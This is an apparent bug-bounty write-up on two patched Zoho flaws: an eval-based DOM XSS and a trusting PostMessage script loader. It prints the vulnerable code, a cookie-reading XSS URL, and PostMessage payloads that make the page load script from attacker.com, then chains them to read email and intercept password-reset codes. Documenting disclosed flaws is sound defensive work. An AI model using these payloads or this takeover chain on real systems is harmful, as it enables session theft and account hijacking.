How a Single Click Can Fully Compromise a Zoho Account: DOM XSS and PostMessage Misconfiguration Explained

Vulnerability Overview

The researcher identified two independent high‑severity issues in Zoho that each allow full account takeover (ATO): a DOM‑based XSS on www.zoho.com.cn and a PostMessage configuration error on www.zoho.com. Either flaw alone can be exploited to hijack a victim’s account.

1. DOM XSS Detail

Discovery

The vulnerable URL https://www.zoho.com.cn/assist/videos/#payload was found during routine security scanning.

Technical Analysis

The page loads JavaScript that extracts the fragment identifier (the part after ‘#’) from the URL and passes it directly to eval(). The relevant snippet is:

$(document).ready(function(e) {
  var tv_id = window.location.href.split('#');
  if (!tv_id[1] == "") {
    autoplay(tv_id[1]);
  }
});

function autoplay(tar) {
  var target_v = eval(tar);
  // ...
}

When a victim visits a URL such as

https://www.zoho.com.cn/assist/videos/#alert(document.cookie)

, the fragment is evaluated, allowing arbitrary JavaScript execution. This enables cookie theft, page hijacking, and phishing.

Impact

Exploiting the DOM XSS can steal the user’s session cookie, hijack page content, and serve as a stepping stone for further account‑takeover techniques.

2. PostMessage Misconfiguration Detail

Discovery

Analysis of scripts on www.zoho.com revealed an insecure PostMessage handling routine.

Technical Analysis

The page checks for a ps_editor parameter in the URL; if present, it loads an external script scriptLoader.js. Inside that script a message listener is registered:

window.addEventListener("message", ps_loader.messageListener);

ps_loader.messageListener = function(event) {
  if (event.data.id === "pagesense-scriptloader-message") {
    const eventAction = event.data.action;
    switch (eventAction) {
      case "updateServerDomain": {
        SERVER_DOMAIN = event.data.serverDomain;
        break;
      }
      case "loadScript": {
        var scripts = event.data.scripts;
        for (var i = 0; i < scripts.length; i++) {
          ps_loader.loadScript(scripts[i]);
        }
        break;
      }
    }
  }
};

The listener blindly trusts the SERVER_DOMAIN value supplied via PostMessage and then loads scripts from that domain, enabling an attacker to inject arbitrary JavaScript.

Exploitation Steps

Send a PostMessage that sets SERVER_DOMAIN to an attacker‑controlled server, e.g.

{"id":"pagesense-scriptloader-message","action":"updateServerDomain","serverDomain":"attacker.com"}

.

Send a second PostMessage that instructs the loader to fetch a script, e.g.

{"id":"pagesense-scriptloader-message","action":"loadScript","scripts":["editor"]}

. The page then loads https://attacker.com/pagesense/initializer/editor.js, executing any attacker code.

3. Account Takeover Attack Chain

IFRAME Nesting

The workplace.zoho.com page embeds an iframe pointing to mail.zoho.com. The iframe permits parent‑child communication via PostMessage, linking the two vulnerabilities.

CORS Bypass to Read Mail

When Zoho Mail loads, it fetches data from zmXX.zoho.com. The response headers allow cross‑origin requests from www.zoho.com. Combined with the PostMessage flaw, an attacker can read the victim’s email content from the parent page.

OTP Interception

During a password‑reset flow, Zoho sends a one‑time password (OTP) to the user’s email. Because the attacker can read that email, they can capture the OTP and complete the login, achieving full account takeover.

4. Timeline

2024‑01‑16: DOM XSS first reported.

2024‑01‑24: PostMessage issue reported.

2024‑02‑09: DOM XSS patched.

2024‑03‑19: PostMessage issue patched.

2024‑04‑12: Bug bounty awarded ($1,000 for DOM XSS, $100 for PostMessage).

2024‑04‑25: Additional $1,100 reward.

5. Mitigation Recommendations

Apply the latest Zoho updates; the vendor has already patched both flaws.

Never click unverified links, especially those containing a fragment identifier (e.g., #payload).

Enable two‑factor authentication (2FA) to mitigate OTP theft.

Regularly review login activity and revoke unknown sessions promptly.